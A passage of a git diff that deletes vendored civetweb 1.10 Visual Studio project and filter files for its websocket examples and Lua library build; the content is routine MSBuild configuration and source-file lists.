-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj.filters
deleted file mode 100644
index 9adb8fb..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj.filters
+++ /dev/null
@@ -1,36 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\examples\websocket\WebSockCallbacks.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\websocket\websocket.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\examples\websocket\WebSockCallbacks.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj
deleted file mode 100644
index 013c887..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj
+++ /dev/null
@@ -1,160 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{58B93E94-7766-435E-93AE-42A2FB5D99B2}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>ex_websocket_client</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\examples\websocket_client\websocket_client.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj.filters
deleted file mode 100644
index c91ce3e..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\websocket_client\websocket_client.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj
deleted file mode 100644
index a92e92a..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj
+++ /dev/null
@@ -1,191 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{8F5E5D77-D269-4665-9E27-1045DA6CF0D8}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>lua_lib</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>StaticLibrary</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>TurnOffAllWarnings</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;_DEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>LUA_COMPAT_ALL;THREADSAFE=1;SQLITE_ENABLE_FTS3;SQLITE_ENABLE_FTS3_PARENTHESIS;WIN32;NDEBUG;_WINDOWS;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Windows</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\third_party\lfs.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lapi.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lauxlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lbaselib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lbitlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lcode.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lcorolib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lctype.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldblib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldebug.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldo.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldump.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lfunc.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lgc.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\linit.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\liolib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\llex.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lmathlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lmem.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\loadlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lobject.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lopcodes.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\loslib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lparser.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstate.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstring.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstrlib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltable.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltablib.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltm.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lundump.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lvm.c" />

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lzio.c" />

-    <ClCompile Include="..\..\src\third_party\lsqlite3.c" />

-    <ClCompile Include="..\..\src\third_party\LuaXML_lib.c" />

-    <ClCompile Include="..\..\src\third_party\sqlite3.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\third_party\lfs.h" />

-    <ClInclude Include="..\..\src\third_party\sqlite3.h" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj.filters
deleted file mode 100644
index 657c5f2..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/lua_lib/lua_lib.vcxproj.filters
+++ /dev/null
@@ -1,135 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\third_party\lsqlite3.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\sqlite3.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lfs.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lapi.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lauxlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lbaselib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lbitlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lcode.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lcorolib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lctype.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldblib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldebug.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldo.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ldump.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lfunc.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lgc.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\linit.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\liolib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\llex.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lmathlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lmem.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

